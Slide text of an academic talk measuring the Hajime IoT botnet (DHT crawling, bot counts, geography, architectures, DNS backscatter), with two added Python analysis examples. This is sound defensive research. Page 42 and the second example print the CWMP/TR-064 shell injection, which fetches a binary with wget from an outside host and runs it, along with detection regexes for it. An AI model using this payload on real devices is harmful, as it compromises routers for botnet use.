Page 1: Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet
Stephen Herwig, Katura Harvey, George Hughey, Richard Roberts, Dave Levin
University of Maryland; The Max Planck Institute for Software Systems
Page 2: Rise of IoT Botnets
Hajime:
- Resilient C&C
- Targets many CPU arches
- Scanning behavior arch-specific
- Continuously deploys new exploits
Page 3: Talk Overview
- Describe: Hajime P2P network; our measurement infrastructure
- Analyze: heterogeneous botnet composition; impact of three exploit deployments
- Discuss: challenges of new, resilient botnets
Pages 4-8: BitTorrent's P2P Network
Uses a DHT to track who is downloading what:
- A peer hosting a file named F announces hash(F) to the DHT; the DHT peers that receive the announce are then "hosting hash(F)".
- A peer that wants to download F looks up hash(F); the DHT provides random subsets of the current uploaders.
Pages 9-10: Hajime's P2P Network ① Uses BitTorrent's DHT to find other bots
Bots announce hash(F) and look up hash(F) exactly as BitTorrent peers do (the DHT returns a random subset), but the announced name F encodes:
- Date: a new name once per day
- File type: .i ("infect") or .atk ("attack")
- Architecture: MIPS little endian, MIPS big endian, ARM v5, ARM v6, ARM v7
Every day, bots are announcing their actions and their devices' architectures.
Hajime's design is primed for measurement!
Pages 11-12: Hajime's P2P Network ② Fetch files directly from one another
Once the DHT lookup has returned a hosting bot, the downloading bot contacts it directly: key exchange first, then the file request.
Keys provide long-lived identifiers.
Page 13: Hajime's P2P Network
① Uses BitTorrent's DHT to find other bots
② Fetch files directly from one another
Difficult to take down Hajime (without also taking down BitTorrent)
Difficult to centrally monitor
Hajime is a resilient next step in IoT botnets
Pages 14-17: Measuring Hajime's P2P network ① Exhaustively list all peers
Our crawler looks up hash(F) at the DHT nodes hosting hash(F). Each lookup returns only a random subset of the peers, so the lookup is repeated until every peer has been listed.
Every 16 minutes for 4 months: 5,404,045 total IP addresses found
Example names looked up: i/mipseb/today, atk/arm7/today, i/mipsel/tomorrow, atk/arm5/yesterday
Pages 18-20: Measuring Hajime's P2P network ② Obtain each Hajime bot's public key
Via the key exchange with each peer: 10,536,174 total keys found
[Scatter plots: keys vs. IPs per country (Iran, Mexico, China, India, South Korea, United States, Turkey, Russia, Indonesia, Brazil); first plot 0-120K keys by 0-100K IPs, second plot 0-900K by 0-900K]
NATs undercount bots based on IPs
IP reassignment overcounts bots based on IPs
Page 21: Datasets
- DHT scans: 5,404,045 unique IP addresses
- Key scans: 10,536,174 unique keys
- Reverse engineering: 47 modules (34 .atk, 13 .i)
Jan 25, 2018 – Jun 1, 2018
All available at iot.cs.umd.edu
Page 22: Analysis Questions
Characteristics: How large is the botnet? Where are bots located? What devices make up the botnet?
Dynamics: How do exploits change the botnet? How quickly does Hajime update itself? How does Hajime deploy new exploits?
Pages 23-24: How big is Hajime?
[Plot: number of distinct bots vs. time (20-minute bins), 01-26 through 06-01, y-axis 0K-100K; vertical markers for atk.mipseb and .i.mipseb updates]
Steady-state of ~40K bots
Peaks of 95K after Chimay-Red and GPON exploits
Pages 25-28: Where are bots located?
[Plot: number of distinct bots vs. time (20-minute bins), 01-26 through 06-01, stacked by country: Brazil, Iran, Mexico, China, India, S. Korea, US, Turkey, Russia, Indonesia, Others; markers for atk.mipseb and .i.mipseb updates]
The geographic makeup of IoT botnets can change rapidly
- Chimay-Red: Russia expanded 500 → 6,000 hourly
- GPON: mostly affected Mexico
Pages 29-30: What CPU architectures are most infected?
[Plot: number of distinct bots vs. time (20-minute bins), 01-26 through 06-01, by architecture: mipseb, mipsel, arm7, arm6, arm5; markers for atk.mipseb and .i.mipseb updates]
Devices overwhelmingly run MIPS
74.2% of bot devices are MIPS big-endian (mipseb)
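An added example, not the authors' measurement code, of the counting behind pages 18 through 30: constructed DHT sightings are binned into 20-minute windows and distinct bots are counted once by IP and once by long-lived key, which makes the NAT undercount and the IP-reassignment overcount visible; the announced names are then split into per-architecture shares. The sightings, addresses and key labels are all constructed.

```python
"""Added example, not the authors' measurement code: bin constructed Hajime-style
DHT sightings into 20-minute windows and count distinct bots by IP and by the
long-lived key, so the NAT and IP-reassignment biases become visible."""
from collections import defaultdict
from datetime import datetime

# Constructed sightings: (UTC time seen, source IP, bot public key, announced name).
# Announced names follow the "<type>/<arch>/<date>" scheme from the slides;
# addresses and key labels are made up.
OBSERVATIONS = [
    ("2018-03-15T10:02:00", "203.0.113.5", "key-A", "atk/mipseb/2018-03-15"),
    ("2018-03-15T10:05:00", "203.0.113.5", "key-B", "atk/mipseb/2018-03-15"),  # second bot behind the same NAT
    ("2018-03-15T10:07:00", "198.51.100.9", "key-C", "i/arm7/2018-03-15"),
    ("2018-03-15T10:31:00", "203.0.113.5", "key-A", "atk/mipseb/2018-03-15"),
    ("2018-03-15T10:33:00", "198.51.100.9", "key-C", "i/arm7/2018-03-15"),
    ("2018-03-15T10:35:00", "192.0.2.77", "key-C", "i/arm7/2018-03-15"),  # key-C again from a reassigned IP
    ("2018-03-15T10:39:00", "192.0.2.78", "key-D", "atk/mipsel/2018-03-15"),
    ("2018-03-15T10:40:00", "192.0.2.79", "key-E", "not/a/hajime/name"),  # malformed, must be ignored
]

ARCHES = {"mipseb", "mipsel", "arm5", "arm6", "arm7"}


def parse_name(name):
    """Split 'atk/mipseb/2018-03-15' into (type, arch, date); None if it does not fit the scheme."""
    parts = name.split("/")
    if len(parts) != 3 or parts[0] not in ("i", "atk") or parts[1] not in ARCHES:
        return None
    return tuple(parts)


def bin_start(ts):
    """Floor an ISO-8601 timestamp to the start of its 20-minute bin."""
    t = datetime.fromisoformat(ts)
    return t.replace(minute=(t.minute // 20) * 20, second=0, microsecond=0)


def count_distinct_per_bin(observations):
    """Return {bin_start: {"ips": n, "keys": n}}: distinct IPs vs. distinct keys per bin."""
    ips, keys = defaultdict(set), defaultdict(set)
    for ts, ip, key, name in observations:
        if parse_name(name) is None:
            continue  # only names that follow Hajime's scheme count as bot sightings
        b = bin_start(ts)
        ips[b].add(ip)
        keys[b].add(key)
    return {b: {"ips": len(ips[b]), "keys": len(keys[b])} for b in ips}


def arch_shares(observations):
    """Fraction of distinct keys announcing each architecture (the slides' per-arch breakdown)."""
    by_arch = defaultdict(set)
    for _, _, key, name in observations:
        parsed = parse_name(name)
        if parsed is not None:
            by_arch[parsed[1]].add(key)
    total = len(set.union(*by_arch.values())) if by_arch else 0
    return {arch: len(s) / total for arch, s in by_arch.items()}


if __name__ == "__main__":
    # First bin: 2 IPs but 3 keys (NAT undercount); second bin: 4 IPs but 3 keys (reassignment overcount).
    for b, counts in sorted(count_distinct_per_bin(OBSERVATIONS).items()):
        print(b.strftime("%Y-%m-%d %H:%M"), counts)
    print(arch_shares(OBSERVATIONS))
```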
Pages 31-36: How does CPU architecture vary by country?
[Bar charts: number of distinct bots per country, y-axis 0K-600K, stacked by architecture (arm5, arm6, arm7, mipsel, mipseb, unknown); left chart: BR, CN, IR, IN, KR, US, TR, RU, MX, IT; right chart, after the introduction of the GPON vulnerability: BR, IR, MX, CN, IN, KR, US, TR, RU, ID; Mexico highlighted before and after GPON]
IoT botnets are highly heterogeneous across the world
After the introduction of the GPON vulnerability, Mexico changed from primarily ARM to primarily MIPS
New vulnerabilities can lead to drastic changes in geography and composition
Pages 37-38: What devices are infected?
DHT scans joined with Censys
No device information on over 80% of bot IP addresses
Of those identifiable: 0.8% MikroTik the day before Chimay-Red, 80.3% the day after
Pages 39-41: How quickly does Hajime disseminate module updates?
[Plots: % of mipseb bots hosting or looking up each file version vs. time (20-minute bins), 03-15 through 05-24, y-axis 0-100; one panel per .i version and one per .atk version]
Quick
Inconsistent
A new .i clears old atks.
Page 42: Hajime's CWMP exploit
The injected parameter: <NewNTPServer1>SHELL_INJECTION</NewNTPServer1>
where SHELL_INJECTION is the command string: cd /tmp;wget http://1.2.3.4:5678/3; chmod 777 3;./3
Pages 43-45: Attacking a non-vulnerable host
<NewNTPServer1>SHELL_INJECTION</NewNTPServer1>
A non-vulnerable host does not run the injected string; it treats the value as a domain name ("This is a domain name") and hands it to its local DNS resolver. The resolver does not recognize the top-level label ("What's this TLD?") and asks D-root, which answers NXDOMAIN; the resolver returns NXDOMAIN to the host.
Page 46: What we learn from D-root
DNS Backscatter: the NXDOMAIN lookups arriving at D-root are a sample of attack attempts worldwide, but only those made against non-vulnerable hosts.
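An added example, not the authors' D-root pipeline, of the defender's side of this backscatter: it classifies DNS query names that are really the TR-064/CWMP NewNTPServer1 payload, counts attempts per 20-minute bin as the slides do, and extracts the loader host:port for a block list. The log format, the client addresses and the second loader address are constructed; only the first command string is the one from the slide.

```python
"""Added example, not the authors' D-root analysis: classify DNS query names
that are really the TR-064/CWMP NewNTPServer1 payload. A non-vulnerable host
tries to resolve the injected string as a hostname, so the payload text shows
up verbatim as a query name in resolver and root-server logs."""
import re
from collections import Counter
from datetime import datetime

# Constructed log lines in an assumed "<ISO time> <client IP> <query name> <rcode>"
# format. Query names may contain spaces here because the injected string does.
LOG_LINES = """\
2018-03-15T10:02:11 203.0.113.5 cd /tmp;wget http://1.2.3.4:5678/3; chmod 777 3;./3 NXDOMAIN
2018-03-15T10:09:40 198.51.100.9 pool.ntp.org NOERROR
2018-03-15T10:15:02 192.0.2.77 cd /tmp;wget http://1.2.3.4:5678/3; chmod 777 3;./3 NXDOMAIN
2018-03-15T10:41:57 192.0.2.78 time.example.net NOERROR
2018-03-15T10:44:13 203.0.113.7 cd /tmp;wget http://198.51.100.200:80/x; chmod 777 x;./x NXDOMAIN
"""

# Characters that can never appear in a hostname but do appear in shell command lines.
SHELL_META = re.compile(r"[;|&`$ ]")
# The download step of the payload: fetch tool, optional flags, then host[:port].
FETCH_URL = re.compile(r"\b(?:wget|curl|tftp)\s+(?:-\S+\s+)*(?:http://)?([0-9A-Za-z.\-]+)(?::(\d+))?")


def parse_line(line):
    """Split one constructed log line into (datetime, client, qname, rcode)."""
    time_s, client, rest = line.split(" ", 2)
    qname, rcode = rest.rsplit(" ", 1)  # rcode is the last token; the qname may hold spaces
    return datetime.fromisoformat(time_s), client, qname, rcode


def is_injection(qname):
    """True when the name cannot be a hostname and carries a download-and-run command."""
    return SHELL_META.search(qname) is not None and FETCH_URL.search(qname) is not None


def loader_endpoint(qname):
    """(host, port) the payload downloads its next stage from; useful as a block-list entry."""
    m = FETCH_URL.search(qname)
    if m is None:
        return None
    return m.group(1), int(m.group(2) or 80)


def summarize(log_text):
    """Injection attempts per 20-minute bin, plus every loader endpoint observed."""
    per_bin = Counter()
    endpoints = set()
    for line in log_text.splitlines():
        t, _client, qname, _rcode = parse_line(line)
        if not is_injection(qname):
            continue
        b = t.replace(minute=(t.minute // 20) * 20, second=0, microsecond=0)
        per_bin[b.strftime("%Y-%m-%d %H:%M")] += 1
        endpoints.add(loader_endpoint(qname))
    return per_bin, endpoints


if __name__ == "__main__":
    per_bin, endpoints = summarize(LOG_LINES)
    print(dict(per_bin))      # two attempts in the 10:00 bin, one in the 10:40 bin
    print(sorted(endpoints))  # loader hosts seen in the backscatter
```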
Pages 47-49: DNS Backscatter: Mirai vs. Hajime
[Plot: TR-064 injection attempts vs. time (20-minute bins), 11/16 through 05/18, y-axis 0-60K, with separate Mirai and Hajime series; Hajime update markers: config, .i.mipseb, atk.mipseb, .i.mipsel, atk.mipsel]
Page 50: Where is Hajime from?
Initial (test?) CWMP attack came from the Netherlands
Reverse engineering of the 47 modules (34 .atk, 13 .i): Hajime blacklists the same IP addresses as Mirai, plus 77.247.0.0/16, 85.159.0.0/16, 109.201.0.0/16
These have one ISP in common: NFOrce Entertainment (located in the Netherlands)
Page 51: Also covered in the paper
- Details on bot internals and exploits
- Analysis of bot churn
- Details on device fingerprinting
- Country-level analysis of CWMP DNS backscatter
Page 52: Measuring and analyzing Hajime
- Data: DHT scans, key scans, D-root
- IoT botnets are resilient and large: 40K steady, 95K peak
- IoT botnets have highly heterogeneous architectures
- New vulnerabilities can lead to drastic changes in size, geography, and composition
Code and data coming soon: iot.cs.umd.edu